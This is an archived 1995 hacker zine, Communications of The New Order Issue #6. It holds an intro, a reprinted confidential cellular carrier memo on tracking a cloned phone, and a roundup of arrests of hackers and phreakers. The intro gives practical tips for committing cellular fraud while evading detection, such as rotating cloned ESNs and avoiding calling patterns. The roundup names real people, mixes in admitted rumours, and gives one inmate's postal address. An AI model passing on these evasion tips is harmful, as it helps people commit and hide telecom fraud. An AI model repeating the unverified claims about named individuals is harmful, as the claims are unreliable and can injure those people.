home *** CD-ROM | disk | FTP | other *** search
Text File | 2003-06-11 | 165.8 KB | 3,589 lines |
- ______ ______ _____________ ____ ___ ______
- / ____|\ / \ /____ ____/\ / | \ / / | / \
- / / ____\| / __ |\ \_/ /\____\/ / | / / / / __ |\
- / / / / /__/ / | / / / / /| |/ / / / /__/ / |
- / /__/______ | / / / / / / / | / / | / /
- |____________|\ |\_____ / / /__ / / /___/ / |___/ / |\_____ / /
- |_____________\| \|____| / \__\ / |___ |/ |___|/ \|____| /
-
- ____
- / \ ---
- / \ \ __
- / /\ \ \ \
- _/______|_/ / / / \
- | | / / / /
- | ---\( |/ / / /
- | \|\(/ \(/\(/
- | |
- / /
- / \ /
- / \ ___/
- /
- /
- /
-
- Communications of The New Order
- Issue #6
- Fall 1995
-
-
- "There is nothing more difficult to take in and, more perilous
- to conduct, or more uncertain in its success, than to take the
- lead in a new order of things."
-
- - Niccolo Machiavelli'
-
-
- Cavalier........"I hacked codes to get warez for free drugs."
- Dead Kat........"I have non-hacker friends but fuck if I keep in
- contact with them, they don't have k0d3z."
- Disorder........"US West knew we were getting their stuff, they
- just didn't know we were on the deferred payment
- plan."
- Edison.........."I said fuck you cop.. well I wish I had said that."
-
- Major..........."SUNOS... the swiss cheese of unix."
- Voyager........."I don't think money is as powerful as fear, but
- I have a day job."
-
-
-
-
- Special Thanks: Gatsby, Mark Tabas, The Doktor, Presence,
-
- Demonika, Rage (303), Invalid Media, Deathstar, KevinTX,
- Intrepid Traveler, Plexor, yLe, Drunkfux, Damien Thorne,
- Brownstone, Storm Bringer, Neophyte, Ole Buzzard, AntiChrist,
- Redboxchilipepper, El Jefe, Jupiter, Captain Hemp.
-
- Good Luck: Mark Tabas, Gatsby, Kevin Crow, Dispater, St. Elmo,
- Zibby, Dr. Delam, Phantom Phreaker, Purple Condom, Manson,
- BernieS, Kevin Mitnick, Alphabits.
-
-
- <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-
-
-
- __/\iNTRo/\__
-
-
- CoTNo is a 'zine of the computer underground of the 1990's. It is written
- for H4Qu3r's and pHR3aCK3r's of intermediate to beginning experience. All
- the information published herein is as accurate as possible and pertains to
- techniques and devices that actually work. We do not publish any article
- that is not of an H/P nature. If you wish to comment on or contribute to
- CoTNo, email one of us, or catch one of us on the iRC or try to catch
- us in your local Telco dumpster.
-
- Ahem...
-
- This issue is dedicated to all of our good friends who have recently been
- busted. In fact, the last three issues are dedicated to them, since there
- have been more people busted in the last twelve months then at any time since
- Sundevil. In issue four I espoused my opinion that there was a federal
- conspiracy at work with paid informants masquerading as our friends. Last
- issue I gave detailed information on one of our own busted members, John
- Falcon. In this issue there will be information you can use to help keep
- yourself out of jail.
-
- In this issue, Disorder has compiled detailed information on the busts of
- lasts twelve months. Each bust that we heard of is detailed with names and
- events. Hindsight is always clearer than foresight, so hopefully you can
- learn from these busts how to avoid a similar fate. Also in this issue, I
- am releasing confidential information on how cellular fraud is prevented.
- The information is straight from a national cellular carrier and details
- exactly how the telcos detect, trace, and bust cellular abuse. This
- information should convince you to take the utmost precautions if you are
- experimenting with cellular technology. Lastly, John Falcon sent me an
- article on what to do if you do get busted. I think this is the first H/P
- article ever written from jail!
-
- The following information was an actual article from Cellular One that was
- distributed to some of their employees. This article was not edited in
- anyway, and contains the best information I have ever seen on how cellular
- fraud is prevented. If you are participating in cellular phreaking, I
- recommend that you read this article very closely and take it as a warning
- from the Cellular Telephone industry. They are getting serious about halting
- cellular fraud, and for good reason. In New York for instance, often
- there are more fraudulent cellular calls than legitimate ones on any given
- day! The Fedz are on their side too. As you may already know, the Fedz ran
- an underground BBS for 8 months this year just to catch Cellular Fraudsters.
- In fact, Kevin Mitnick was recently busted using the same methods described
- in the following article.
-
- The article, dated February 1995, follows:
-
- A team of five Cellular One employees helped stop cellular fraud in Denver
- last week. To protect both our employees and future investigations,
- Cellular One team members names will not be released.
-
- California officials tracked a suspect from the Los Angeles area using a
- cloned cellular phone to Denver early last week and asked Cellular One for
- assistance in locating this suspect. With the cloned cellular phone number
- and a number the suspect repeatedly called in California, the five Cellular
- One employees and both local and California law enforcement agents began
- tracking the whereabouts of the suspect through the pattern of his cellular
- phone calls.
-
- Using AMA searches, RFCALL Trace, directional antennas, an IFR 1500, an
- RSAT Plus, and hours of labor, the Cellular One team identified the suspect's
- calling patterns. An AMA search is a record of an individual cellular
- phone number's calls. The cellular number is input along with the
- parameters for the search - start and finish date and time - and a log is
- printed which shows each individual call made by that cellular number.
- This tool is used generally within three days of the calls which you wish
- to observe. AMA searches were compiled over several days to document the
- calling patterns of the suspect.
-
- While the AMA searches show the past calling pattern, when attempting to
- capture a cellular fraud suspect, real time tools must also be used. The
- Cellular One team used RFCALL Trace which tracks similar information as an
- AMA record with the exception that the information can be collected with
- only a 10 second delay from real time. RFCALL Trace also tracks the
- individual radio in use, any handoffs, and the signal strength of
- the cellular call. Law enforcement agents issued a subpoena to Cellular One
- for all information regarding the fraudulent cellular phone number's
- activity on our system.
-
- Most of the fraudulent phone calls were being placed between 10am and
- midnight. Tracking which cell sites, cell faces, and radios the suspect's
- calls set up on identified a small geographical area as the suspect's base of
- action. Once an area had been established, one team member drove this area
- using an RSAT Plus, an IFR 1500, and a directional antenna (all basic
- cellular test equipment used in system optimization) to pinpoint the suspect's
- location to a specific apartment complex. This team me tracked the calls
- made by the suspects's cellular number and, watching the faces serving the
- calls and he handoffs made by the system during the suspect's calls, he was
- able to narrow down the location from which the calls were made to a specific
- side of one apartment building.
-
- The law enforcement agents, equipped with their own brand of cellular fraud-
- busting tools, asked if the Cellular One team could identify the actual
- apartment within the building where the calls were being placed. A narrowband
- directional antenna was set to the transmit frequency of the cloned phone.
- One problem was that with each new phone call, the frequency being tracked
- changed. The suspect made short calls, most around one minute, with the
- longest between three to five minutes. Using the directional antenna
- and resetting the frequency with each new call on the cloned phone, the
- Cellular One employee identified a group of apartments within the building
- from which the cellular calls were being placed.
-
- Unfortunately, the suspect slipped out of the building before the specific
- apartment was identified. Again using RFCALL Trace, the Cellular One team
- logged the suspect's next phone call on a cell site near Stapleton
- Airport. Law enforcement was notified and kept aware of the phone calls as
- the suspect traveled throughout the system. It became evident that the
- suspect was moving back toward the apartment complex. Surveillance
- officers outside the apartment noticed three men enter just moments before
- the Cellular One team notified them that a call had been placed from the
- apartment. Within 20 minutes, the suspects again left the apartment.
- Denver Police began pursuit of the suspect and made the arrest. Five
- additional cellular phones were found in the suspect's apartment. It has
- not been determined if these phones are cloned.
-
- Although cellular fraud exists, it is possible to catch the criminals.
- Congratulations to our fraud busters! Cellular One asks that you keep this
- story confidential since the specifics of this and future investigations
- depend on our ability to catch the criminals in action.
-
- End of Cellular One Article.
-
- Pretty scary, huh? Cellular phreaking used to be considered pretty safe, but
- times have changed. The cellular phone companies are losing so much money on
- cellular fraud, that they have made busting the cellular hackers a priority.
- If you do commit cellular fraud, I suggest you use the following guidelines:
-
- 1. Never use the fraudulent ESN for over two weeks.
- 2. Change ESN's as often as possible.
- 3. Avoid creating a calling pattern with your fraudulent ESN.
- 4. Avoid using the fraudulent ESN from a stationary location.
-
- These tips could keep you out of jail! Because you cannot divert with a
- cellular phone (unless you are Kevin Mitnick) these precautions are necessary.
- As my friend John Falcon told me, "Its not worth doing time for silly phone
- shit." He's right. H/P is fun, but anyone who has gotten busted will tell
- you the same.
-
- But if despite these warnings, you still decide to cellular phreak, just make
- this quote from Gatsby your mantra, "An ESN a day, keeps the federals away."
-
- |>ead|<at
-
- -=(TNo)=-
-
-
- Table of Contents
- ~~~~~~~~~~~~~~~~~
- Introduction......................................Dead Kat
- Operation Phundevil...............................Disorder
- What Happens When You Get Caught..................John Falcon
- Legal and Technical Aspects of RF Monitoring......Major
- The Tao of 1AESS..................................Dead Kat & Disorder
- Frequently Visited AT&T Locations.................Major & Dead Kat
- Remote Hacking in Unix............................Voyager
- The Definity Audix VMS Inside Out.................Boba Fett
- Bridging the Gap..................................Eddie Van Halen
- Elite Music Part V................................Disk Jockey
- Conclusion........................................Dead Kat
-
-
-
-
- <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-
-
-
- -= Operation Phundevil =-
-
- by DisordeR[TNo]
-
-
- With all the busts happening in the past year, and a lack of
- information in the scene regarding who got busted when, and for what,
- I decided to put this article together. After working on this for a
- while, I realized that not only was it a little difficult in finding
- bust info, but half of the little you found was bullshit.
-
- The information in the following article is as accurate as I
- can find. With all the different accounts of what happened, different
- nicknames, different NPA's, and pure stupidity out there, don't bet your
- life on the information contained within this article.
-
- The following sections give you some details about some busts,
- and RUMORS of others. I indicate which are rumors and which are legit.
- I utilized everything from BBS posts, to newspaper articles, to word
- of mouth. Thanks to those who helped me on this. And by no means is this
- NEAR complete...
-
- =-=
-
- "OPERATION CYBERSNARE: FEDZ = 1, PHREAKZ = 0"
-
- Main Thugs:
- Peter A. Cavicchia II - Special Agent in Charge
- Donna Krappa - Assistant U.S. Attorney in Newark
- Stacey Bauerschmidt - "Carder One"
-
- The Busted:
- Richard Lacap - "Chillin" - Katy, Texas: Accused of conspiring to break
- into the Portland, Oregon AT&T Wireless computers.
- Kevin Watkins - "Led" - Houston, Texas: Accused of conspiring to break
- into the Portland, Oregon AT&T Wireless computers.
- Watkins used the computer system of Embry Riddle University in
- Prescott, Ariz., to enter the McCaw computer, Secret Service
- Special Agent Stacey Bauerschmidt said in a sworn statement.
- Jeremy Cushing - "Alpha Bits" - Huntington Beach, California: Accused
- of trafficking in cloned cellular phones/equipment and stolen
- access devices (ESN/MIN Pairs).
- Frank Natoli - "Mmind" - Brooklyn, New York: Accused of trafficking in
- stolen access devices.
- Al Bradford - "Cellfone" - Detroit, Michigan: Accused of trafficking in
- unauthorized access devices.
- Michael Clarkson - "Barcode" - Brooklyn, New York: Accused of possessing
- and trafficking in hardware used to obtain unauthorized access to
- telecommunications services.
-
- Penalty:
- If convicted, defendants face maximum possible sentences ranging
- from 15 years for Cushing to 10 years for Bradford, Clarkson and
- Natoli and five years for Lacap and Watkins.
-
- Details:
- Starting in January, Stacey Bauerschmidt and other Secret Service
- agents in Newark, NJ, set up what is now called "an electronic chop shop"
- by the press. Stacey (in cooperation with a 'nameless informer' who will
- be mentioned later) set up a computer BBS called "Celco 51" with the
- intent of busting hackers and phreakers specializing in cellular phone
- fraud.
- For the first sixth months, the board operated using MBBS with
- four nodes. At any given time the board had an 800 re-route (not really)
- so that the users could call without any problem (ANI). To the credit of
- the agents in charge, the board did not allow just anyone access. The sysop
- (PMF) appeared to discriminate and only allow the 'elite' members of the
- H/P community on. With the illusion of security, the agents running the
- board could successfully monitor the users, and begin to make deals with
- the hackers.
- Stacey [Who went by 'Carder One'] continually asked members of the
- BBS if they were interested in selling ESN/MIN pairs [Used for cellular
- phone fraud]. These 'pairs' are considered 'illegal access devices' and
- are usually found in large enough amounts to consist of felonies. On top
- of the illegal access devices, Stacey was looking for people that were
- willing to sell illegal cloning equipment. This equipment consisted of
- devices used to get pairs, clone phones, and reprogram phones.
- The operation was very successful in many ways, notably the ability
- of the agents to mask the true nature of the board. For over eight months,
- Stacey and other agents monitored the board looking for any chance to
- prosecute any of the members. The sysop (PMF) continuously advertised the
- board to the members, as well as mailed and HARASSED members into calling
- more than they wished to (Entrapment anyone?). PMF was responsible for
- mailing members up to three times a day, message flooding people on IRC,
- and using other methods of harassment to get hackers to call.
- On top of the harassment, Carder One continuously asked for people
- to post 'pairs' as well as sell them in private. In a few cases, individuals
- would not have considered selling these pairs had the federal agents not
- harassed them so much. Ahem.
-
- "Cushing and five others were arrested in four states during a
- sweep last week by federal agents. Another 14 raids spread over eight
- states led to the confiscation of 31 computers, 65 illegally programmed
- phones and 14 "readers," devices used to illegally pluck cellular phone
- numbers and serial codes from cellular phone transmissions."
- [Wonder who's computer will run the next sting board?]
-
- "But because the alleged crooks posted phone numbers on the bulletin
- board indicating where they could be reached, the Secret Service was able to
- trace the calls, leading to the arrests."
- [Need we emphasize the importance of Diverting any more?]
-
- "But officials said this case represented the first time that the
- Secret Service had created an entirely new computer bulletin board..."
- [Couldn't bust any warez kiddies recently...]
-
- [Watch out kiddies... They are using more than 'questionable' methods
- of busting hackers and phreaks these days. If you haven't met someone,
- be careful of what you post on their systems.. many people thought
- PMF was cool until he NARKED on everyone that he could.]
-
- =-=
-
- "ANARCHIST BUSTED FOR WRITING MAGAZINE"
-
- From: The Anarchives <tao@presence.lglobal.com>
-
- In early march of 1995 I was arrested for "Unauthorized Use Of A Computer".
-
- Three large, white, plain-clothes detectives from 52 division in downtown
- toronto came to my house, promptly arrested me, took me to a holding
- cell, and conducted a strip search (looking for codes I guess). I was
- held in custody for four hours (7:30 pm to 11:30 pm), and released as a
- result of substantial protest made by friends and family at the sergeants
- desk.
-
- I was being accused of breaking into the computer systems at the
- University Of Toronto for the purpose of publishing "Anarchist
- newsletters".
-
- The sysadmin of ecf.utoronto.ca, one Professor Jack Gorrie
- <gorrie@ecf.utoronto.ca>, saw someone on his system publishing Anarchist
- materials, assumed I was a malicious "hacker", turned over all records of
- my email, news posts, key strokes, you name it, to the police at 52
- division. The police realizing how dangerous these "hacker anarchist"
- types are, had to come to my house to cuff me, bring me down, and strip
- search me.
-
- I was to face trial for a possible six months in prison, just for
- exercising my democratic rights and responsibilities.
-
- Of course the end result was that the charges were dropped, although this
- was not until several months later (sept 7, 95), after several
- appearances in court, and after my agreeing to pay $400 to the skule.
-
- =-=
-
- "FEDS SAY HACKERS CRACKED INTO TOWER CREDIT CARD RECORDS"
- by, Denny Walsh
-
- From: The Sacramento Bee
- Saturday Sept. 16, 1995
-
- Two talented Berkeley hackers were charged Friday with computer-
- age crimes against a Tower Video rental store in Sacramento, federal
- authorities said, in large part because they went up against Tower's even
- more talented electronic security corps.
-
- When authorities raided their apartment last month, Terry Patrick Ewing,
- 21, and Michael Yu Kim, 20, had the credit card numbers of 2,000 Tower
- customers, federal prosecutors said.
-
- According to a federal grand jury indictment, Ewing and Kim used
- their personal computer to break into a system know as TRON, owned and
- operated by Tower's West Sacramento-based parent, MTS Inc.
-
- Kim and Ewing are charged in a three-count indictment with
- conspiracy, fraud and the unauthorized destruction of computer data.
-
- The prosecutor said the pair are not in custody and will be
- allowed to surrender next week. He said he does not see them as flight
- risks.
-
- =-=
-
- "KEVIN MITNICK BUST - HIGHLIGHTS"
-
- From Multiple Sources
-
- If you want more details, read the hundreds of articles about this story.
- Also, read the Phrack 47 editorial pertaining to this subject.
-
- Kevin Mitnick (31)
- -One of the first indicted under Computer Security Act of 1987
- -Search began in November 1992
- -Mark Seiden (expert in firewalls) discovered that someone had obtained
- all of Netcom's credit card numbers for 20,000 online subscribers.
- -Stole files from: Motorola, Apple, Netcom, and more.
- -Mitnick used the Well as a repository for files he stole from computer
- security expert Tsutoma Shimomura.
- -After raping Tsutoma, he used Bruce Koball's account to transfer
- proprietary software from Motorola, NEC, Nokia, Novatel, Oki, Qualcomm,
- and other cell manufacturers.
- -Shimomura concluded that it was Mitnick, and that he was operating
- through cellular, from Raleigh, NC
- -Mitnick was bouncing his calls through GTE Switches, local switches,
- and a few types of cellular switches, and utilized Netcom's dialins.
- -Lived in Player's Court, a 12-unit apartment building in suburb of
- Duraliegh Hills, three miles from the airport. He lived in Apt 202.
- -Until a week or two before he was arrested, FBI surveillance agents in
- Los Angeles were certain that 'the intruder' was somewhere in Colorado.
- -FBI arrested him at 24 hour stakeout
- -Arrested in Raleigh, N.C. at 1:30 a.m.
-
- =-=
-
- "PHREAKS BUSTED IN NY... MORE TO COME"
-
- "Ok all Listen up and listen good. resistance is down. Maybe permanently. Most
- of you prolly haven't heard yet, but there have been major busts going around.
- ... Today alone i found out that Neon Samurai, Tokien Entry, and Hellfire
- have been busted. ... that they even busted craig neidorf(knight lightnig)
- again.
-
- More bad news. If you are on UPT(unphamiliar territory) or Cellco 51, stop
- calling. The SS who raided hellfire slipped a bit and bragged about being on
- those boards.
-
- Hellfire said the feds were mostly interested in credit cards,
- VMB's, and Cell phones.
-
- They are looking to bust for cellular, VMB's and credit cards...
-
- Tokien entry i found out has been in jail for 2 days!
- Neon Samurai was busted for credit cards and also for telco equipment that
- the nynex people said was worth 50,000. "
-
-
- PMFs (Narc) reply:
-
- "dude, this is utter shit and i expect u to post this reply for me seeing
- as i ain't on that bbs.. Hellfire gave up his accounts to UPT and my bbs
- among others, he was the only person busted and nothing to do with his
- busts was EVER mentioned on my board. He doesn't even get involved in
- cellphones, he was busted coz he and every other person busted used
- 1 800 CALL ATT from his house.. what a bunch of lamers... I don't even
- know who wrote that next but i would like to find out.. probably the guys
- from NYHE..."
- [Ironic isn't it!]
-
- =-=
-
- "ALPHABITS ORIGINAL BUST LAST YEAR"
-
- Caught alphabits on irc lastnight and he said:
-
- <alphabits> but I got sent to prison 7 months ago, and lost contact ***
-
- According to different people, he was busted for check fraud and/or credit
- fraud and/or cellular fraud. Unfortunately, I will not be able to talk
- to him until after this article.
-
- =-=
-
- "SYNCOMM, MEMBER OF S.O.B (SERVANTS OF BABUSHKA) RAIDED"
-
- From another group member:
-
- Syncomm was talking on the phone.. the day before Master of Reality got
- busted... so MOR, Greg and equinox were sitting there chatting away when
- a load of federal agents <SS, FBI, 1 NSA guy and even a guy from customs>
- and some local police busted down his door. He dropped the phone and all
- they heard was a rustle of papers .. then a "Secure that paper!" then a
- click.. They put a shotgun to his head and said "Hello Syncomm". They
- said he was the leader of S.O.B. an international terrorist organization.
- Then again they thought that Crypt Keeper and MOR were also the sole
- leader of SOB ... So then they put a knee to his back and handcuffed him
- <Greg, 16, apparently posed a serious threat>. They proceeded to
- interrogate.. and at one point this one agent <female> tried to seduce him
- into talking <I think he would of he she did more .. ;)> ..
-
- He was finaly was lead outside when his neighbor walked up to them and
- handed them all of Greg's notes, etc.. that greg had asked him to stash..
- Greg then threatened his neighbors life.. <which he came back to do
- unhandcuffed afterwards> and was led off to holding... were they produced
- "A big fucking printout" that apparently detailed Greg's activities.. they
- nailed him for hacking UC and then accused him of crashing their
- systems.. Along with criminal tools <his computer> and some other
- offenses.. <one of which I am sure of is Wire Fraud.. they love that>
-
- =-=
-
- "FBI REVEALS ARREST IN MAJOR CD-ROM PIRACY CASE"
-
- SOFTWARE CRACKDOWN - Two Canadians were arrested in a blitz
- that has software companies upset to see piracy extending
- into the CD-ROM format.
-
- From the Associated Press, Saturday Dec 24 1994
-
- BUFFALO, New York - The FBI has arrested a Canadian father and son in what
- is believed to be the first major case of CD-ROM piracy in the United States.
-
- Agents said Thursday they seized 15,000 counterfeit copies of the popular
- CD Rom games REBEL ASSAULT and MYST that were being sold at 25% of retail
- value.
-
- PETER MISKO, 63, of Mississauga, Ontario, and his son, BRUCE MISKO, 36, of
- CHICAGO were arrested in Buffalo and charged with felony copyright infringe-
- ment. The counterfeit goods were recovered in a Niagara Country warehouse
- authorities said.
-
- The FBI told the Los Angeles Times that additional warrants were served in
- INDIANA and NEW HAMPSHIRE as part of a crackdown on retail stores selling
- the illegal software. MORE ARRESTS ARE EXPECTED.
-
- =-=
-
- "MULTI-COUNTRY EFFORT CRACKS COMPUTER RING"
-
- TORONTO - Canadian, US and European investigators
- have cracked a ring of computer hackers who allegedly
- stole about $5 million US$ by breaking into the
- computers of phone companies and other firms.
-
- The 12 hackers who met over the Internet, used coding
- and call switching to conceal the transfer of funds,
- codes and communications.
-
- RUDY LOMBARDI, 22, of MISSISSAUGA Ontario PLEADED
- GUILTY on Tuesday, June 27 1995. He got 90 days in
- Jail and 100 hours of community services for HELPING
- the RCMP with their investigation - instead of at least
- a one year jail sentence.
-
- =-=
-
- "RUMORS FROM 914"
-
- There has been a huge chain of busts in 914. Apparently, GANGSTER,
- who ran a board in 914 called 'Bamboozie Dimension' was busted. Rumor
- goes on to say that he was 'fucking around with CC's' which led to the
- bust.
-
- =-=
-
- "WAREZ BUSTS IN 510"
-
- The Sewer Line BBS in 510 met trouble on December 11th due to the
- distribution of console warez (from various posts). Rumor also has it,
- that a user on the board going by ROCK'N was in fact a sega representative,
- and narked on the sysop for his activities.
-
- =-=
-
- "214 BUSTS"
-
- During August of '94, several boards (mostly warez/ansi affiliated)
- were raided by the FBI. The busts occurred in the Dallas/Ft. Worth
- area, the list follows:
- Agents of Fortune [409] (Sysop: Butcher [LEGEND])
- Suburbia [214] (Sysop: The Chairman [RZR],
- The Network [214] (Sysop: Masterblaster)
- The Depths [214] (Sysop: Maelstrom ex-[RZR/iCE])
- Elm Street [214] (Sysop: Freddy Krueger)
- User to User [214] (Sysop: William Pendergast)
-
- =-=
-
- "PHILLY 2600 MEETING"
-
- From recent posts and word of mouth, the Philadelphia 2600 meetings are
- having a hard time making it past 5 minutes. Apparently, local police in
- coordination with mall rent-a-cops [joining of forces there], are kicking
- hackers and phreakers out of their meeting place based on charges of
- loitering and conspiracy [to do what?! Assemble?]. Currently, police
- are threatening to break up meetings, and/or jail participants for the
- two reasons cited above.
-
- =-=
-
- "FEDZ BUST KID IN MINNESOTA"
-
- November '94, a 15 year old in Minnesota had a pleasant visit by
- federal agents. According to newspaper articles, the boy [unnamed
- in the article] was basing his hacks out of the Detroit Free-Net.
- "He used passwords to gain access to more than 10 computer networks
- from Detroit to Moscow". During his time on the Detroit Free-Net,
- he was said to have maliciously disabled enough of the system 'forcing'
- it to shut down.
- Currently, the boy is facing potential charges for using
- telecommunications devices to cross state lines, and felony charges
- for breaking into computer systems.
-
- Other favorite quotes from the articles about this case:
- "...hospitalized, possibly for psychological reasons, when police
- confiscated his computer modem and software programs Monday."
-
- "...said the boy appeared to fit the typical hacker profile: a
- 15- to 20-year-old male, many who have low self-esteem. 'He really
- could use a girlfriend instead of a computer' Grewe said."
-
- =-=
-
- "THE TROUBLES OF BERNIE S."
-
- Recently, a lot of press has been covering the story of 'Bernie S'.
- You can find more info about his bust on alt.2600 as well as several
- 'hacker' mailing lists. Here are some of the interesting quotes from
- one of those articles:
-
- "Ed Cummings, also known to many in cyberspace as Bernie SS was arrested
- on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
- of a device to commit Telecommunications fraud charges. He is being held in
- Delaware County Prison in lieu of $100,000.00 Bail."
- His arrest took place at a local 7-11 where *15* police cars pulled
- into the parking lot. During the interaction with the officer, he told
- them 'no, you can't search my car', yet minutes later, he noticed
- an officer going through the contents of his car. Despite his protests,
- the officer removed several timing crystals, tone dialers, and a 'broken
- red box'.
- The following day, Bernie was at a friend's house when '8 to 10' plain
- clothed armed men burst into the house yelling 'freeze'. Minutes later
- he was being taken to jail in cuffs. He was not formally charged until
- his arraignment where his bail was set to 100,000 dollars because he
- refused to talk with the police without counsel present.
- "The Judge dropped the two unlawful use of a computer charges due to
- the fact that the evidence was circumstantial and the county had no actual
- evidence that Ed had ever used the computers in question. As of 3/27/1995
- Ed Cummings is still in Delaware County Prison awaiting his trial."
-
- =-=
-
- "RUSSIANS ARREST 6 IN COMPUTER THEFTS"
-
- This article was taken from the Associated Press, Saturday Dec 24 1994
-
- St. Petersburg, Russia, Sept 26 (AP) -- Russian police
- officers have arrested six more people in a $10 million
- computer theft from Citibank here, but the masterminds are
- said to remain at large.
-
- Several people have been arrested abroad and face charges
- in the United States, including Vladimir Levin, 28,
- reportedly the group's computer hacker.
-
- Citibank officials said they recovered all but $400,000 and
- upgraded the cash-management systems's electronic security
- after the theft.
-
-
- FT, Sept 21, 1995.
-
- Extradition in Citibank hacking case
-
- A British court yesterday approved the extradition to the
- US of Mr Vladimir Levin, the Russian science graduate
- accused of an attempted $10m (6.5m pounds) computer hacking
- fraud on Citibank. ...
-
- =-=
-
- "PURPLE CONDOM CAUSES TROUBLE"
-
- Purpcon recently had pleasant meetings with his Dean where he attends
- college after getting caught rewriting his magnetic student ID, so
- that others would get charged for his meal. :)
-
- =-=
-
- "CoTNo RUMORS"
-
- In past issues of CoTNo we have always said 'good luck to' people
- that have been busted (or said to have been busted)..
-
- Deathstar, AntiChrist (school admins?), Coaxial Mayhem,
- Maestro (Blueboxing?), Lucifer (still in jail?), Grappler (hacking),
- Jimbo (MCI Calling Card Fraud), Maelstrom, and Datastream Cowboy (hello
- CIA spooks), Merc, Crypt Keeper (keep reading), 602 crowd, and the 513 crowd.
-
- At the request of some of the above, I can't go into details on their busts.
-
- =-=
-
- "JOHN FALCON BUSTS"
-
- Since rumors about his bust have been running rampant on the 'Net',
- here are the facts about the bust... for more info, and JF's reply
- to the rumors, read CoTNo 5.
-
- Common myths of my arrest:
-
- 1 - The FBI/NSA cracked my hard drive and read all my encrypted mail.
- 2 - Mr. Falcon left his secring.pgp on his system.
- 3 - FBI/NSA read the RSA encrypted data.
- 4 - My conviction was because I was a hacker.
-
- Let me go over my conviction:
-
- Count 1: Theft of Government Property - How they caught me: Narc
- Count 2: Fraudulent use of an Access Device - How they caught me: Narc
- Count 3: Fraudulent use of a Computer - How they caught me: questionable
- Count 4: Fraudulent use of an Access Device - How they caught me: Narc
-
- If you would like to get in contact with JF, here is his info:
- email: jfalcon@ice_bbs.alaska.net
- snailmail: Don Fanning
- #12617-006
- 3600 Guard Road
- Lompoc, CA 93436
-
-
- =-=
-
- "EPSILON, DAMIEN, SHOCKWAVE (303)"
-
- From CoTNo 3 (Read there for full story)
-
- Three Colorado teen-agers are suspected of setting up an elaborate computer-
- hacking system that tapped into a long-distance telephone company and stole
- secret access codes (k0dez!).
-
- Police arrested Kevin Wilson (Damian), 18, of the 7400 block of South Gallup
- Street in Littleton, and two juveniles (Epsilon and Shockwave) from Jefferson
- County in the alleged scheme.
-
- =-=
-
- "INTERVIEW WITH A CRYPTKEEPER"
-
- ck: I only got busted last February (1994) for hacking
-
- dis: I heard you got hit twice.. once last year, and once a lot more
- +recently..
-
- CK: nope, I moved, I didn't get busted. I only got busted last year,
- once, that's it. And it wasn't real serious.. not like cellphone/money
- laundering..just some inet hacking. I got busted for hacking the
- University of Cincinnati and a few other things on the net.. they
- traced me through a PBX.. they were serious. They thought I was
- a spy. they were pissed to find out I was just a 16 year old.
-
- dis: hmm... bad.. did they just search/seize or what?
-
- ck: search/seized my computer.. I eventually got most of my stuff back
- (the computer, monitor, and keyboard) and had to spend 10 days in
- juvenile thats about it. oh.. and a big pain in the ass too of
- course not bad at all..
-
- dis: anything else?
-
- ck: and tell them I was only busted ONCE, and it wasn't all that serious.
- I don't have any plans to get back into the scene (it sux now), but
- I do enjoy hearing about it sometimes.
-
- =-=
-
- "FEDZ CATCHING ON TO CALLING CARD SKAMS"
-
- A $50 million telephone calling-card theft ring disclosed
- earlier this week by federal investigators is representative of the advanced
- types of scams that have emerged in the last two years as telephone companies
- have become better at ferreting out fraud.
-
- The Secret Service said Ivy James Lay, a switch engineer at MCI's network
- center in Charlotte, N.C., stole over 60,000 calling card numbers from MCI
- and other long distance companies, later selling them to 'band of computer
- hackers.' The estimated value of the cards lies near $50 million. The
- Secret Service (which investigates fraud like this) claims this to be the
- largest case of calling card theft to date.
-
- =-=-=
-
- "SOME OF THE INTERESTING FACTS FROM A NEWSPAPER ARTICLE"
-
- Two computer hackers have been sentenced to fed. prison and an accomplice in
- Mn. awaits sentencing for his part in an international phone conspiracy.
- Ivey James Lay of Haw River, N.C., and Frank Ronald Stanton of Cary, N.C.,
- were part of a hacker ring that stole credit-card numbers from MCI's
- Computer terminal in Greensboro. A third member of the ring, Leroy James
- Anderson, of Minneapolis pleaded guilty Friday in Minnesota to federal
- copyright violations.
-
- US District Court Judge James Beaty on Fri. sentenced Lay to tree years
- and two months in prison. Stanton, a 22-year-old student at Wingate College,
- was sentenced to one year. Anderson's sentencing is expected this summer.
-
- The conspiracy stretched into several European countries and cost long-
- distance carriers more than $28 millon, authorities said.
-
- Lay and Stanton pleaded guilty in Jan. to charges of fraud and trafficking
- in unauthorized access devices. The group bought and sold at least 50,000
- numbers from 1992 until the summer of 1994, according to court documents.
-
- "What I did was very stupid," Stanton told Judge Beaty at his sentencing.
- "I'd like to go back and finish college."
-
- =-=-=
-
- "SHOCKER[303] GETS NAILED FOR CC'S"
-
- Damn, I got busted w/an illegal line tap! FUCK. No jail, just major phone
- bills! They are gunna try to bust me w/Credit Card fraud too. I shoulda
- listened to you. Fuck me. Got my mac taken away, I am writing this from a
- friends, I am not supposed to be here either, but hell, I got everything taken
- away, life sux shit, so do the gawd damn cops. Anyways, um, I'll see what
- happens, I'll call you sometime if I can get to the phone w/out my parents
- knowing. I can't have anything back until I pay for this shit, I think it is
- between $400 and $500, not sure, I already paid $170, but then I hafta
- fucking pay for MY PARENTS phone bill too, I rung the fuck outta that too. I
- got like, a felony and a second degree misdemeanor for that shit, they
- will drop the felony to a misdemeanor tho, I got charged with 'Theft' (felony)
- and criminal tampering (2nd degree misd.) SHIT TO HELL! Damnit. Anys, um, I'll
- see ya ok? Bye..
-
- =-=-=
-
- "NYHE RUMORS"
-
- The New York Hack Exchange got busted for scams and cellfonez...
-
- (Someone mail me with more than a rumor please)
-
- =-=-=
-
- "WAREZ BOARD BUSTS AROUND THE COUNTRY"
-
- Bad Sector [BUSTED!]
- Beyond Corruption [BUSTED!]
- Jurrasic Park [BUSTED!]
- Lineup [BUSTED!]
- Main Frame [BUSTED!]
- Necronomicon [BUSTED!]
- No BBS [BUSTED!]
- The Notice [BUSTED!]
- On The World [BUSTED!]
- Perfect Crime [BUSTED!]
- Red Alert [BUSTED!]
- Restricted Area [BUSTED!]
- Rubbish Heap [BUSTED!]
- Skull Island [BUSTED!]
- Twins [BUSTED!]
- The Underworld [BUSTED!]
- Wolf Pack [BUSTED!]
-
- 15 Arrests
- 75 RCMP Officers Involved
